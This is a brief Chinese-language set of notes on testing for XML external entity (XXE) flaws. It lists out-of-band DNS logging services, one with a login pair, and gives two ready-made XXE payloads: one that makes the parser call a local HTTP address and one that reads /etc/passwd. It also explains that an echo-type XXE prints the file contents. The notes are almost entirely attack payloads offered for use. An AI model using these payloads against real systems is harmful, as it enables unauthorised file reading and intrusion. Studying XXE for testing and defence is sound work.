测试
在线工具:
http://ceye.io/
http://www.dnslog.cn/
https://dnslog.io/
http://admin.dnslog.link/ 账号:test 密码:123456
<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:80" > %xxe; ]>
任意读取文件测试
原理就是构造一个可以访问系统默认文件hosts的Pyload,然后看看响应,看他说缺啥补充啥。如果是回显型XXE就会将配置文件的信息打印出来。
<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "file:///etc/passwd" > ]>